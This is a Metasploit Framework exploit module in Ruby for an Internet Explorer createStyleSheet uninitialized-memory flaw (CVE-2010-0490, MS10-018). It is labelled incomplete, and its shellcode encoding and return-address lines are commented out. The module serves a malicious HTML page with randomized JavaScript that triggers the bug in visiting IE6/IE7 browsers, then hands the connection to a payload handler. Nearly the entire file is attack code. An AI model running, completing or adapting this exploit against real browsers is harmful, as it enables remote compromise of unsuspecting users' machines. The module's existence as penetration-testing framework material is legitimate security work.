##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Internet Explorer createStyleSheet Uninitialized Memory',
			'Description'    => %q{
				TODO
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Alexander Kornburst',             # original discovery
					'Ivan Fratric',                    # original discovery
					'jduck'                            # metasploit module
				],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2010-0490' ],
					[ 'OSVDB', '63332' ],
					[ 'BID', '39031' ],
					[ 'MSB', 'MS10-018' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00\x09\x0a\x0d'\\",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
						{
							'Method' => 'automatic'
						}
					]

					# Nothing specific..
				],
			'DisclosureDate' => 'Mar 30 2010',
			'DefaultTarget'  => 0))
	end


	def on_request_uri(cli, request)

		# Re-generate the payload
		#return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")

		# Encode the shellcode
		#shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Set the return\nops
		#ret  	    = Rex::Text.to_unescape([mytarget.ret].pack('V'))

		# Randomize the javascript variable names
		j_id         = rand_text_alpha(rand(100) + 1)
		j_object	    = rand_text_alpha(rand(100) + 1)
		j_var1       = rand_text_alpha(rand(100) + 1)
		j_var2       = rand_text_alpha(rand(100) + 1)

		# Construct the final page
		html = %Q|<html>
<body>
<a name="link1" <div id="#{j_id}">Loading graph...</div> >
<p>
<script type="text/javascript">
var #{j_object} = document.getElementById('#{j_id}');
#{j_object}.innerHTML = '';
var #{j_var1} = document.createElement('CANVAS');
var #{j_var2} = document.createStyleSheet();
</script></body></html>
|

		# Transmit the compressed response to the client
		send_response(cli, html, { 'Content-Type' => 'text/html' })

		# Handle the payload
		handler(cli)

	end

end
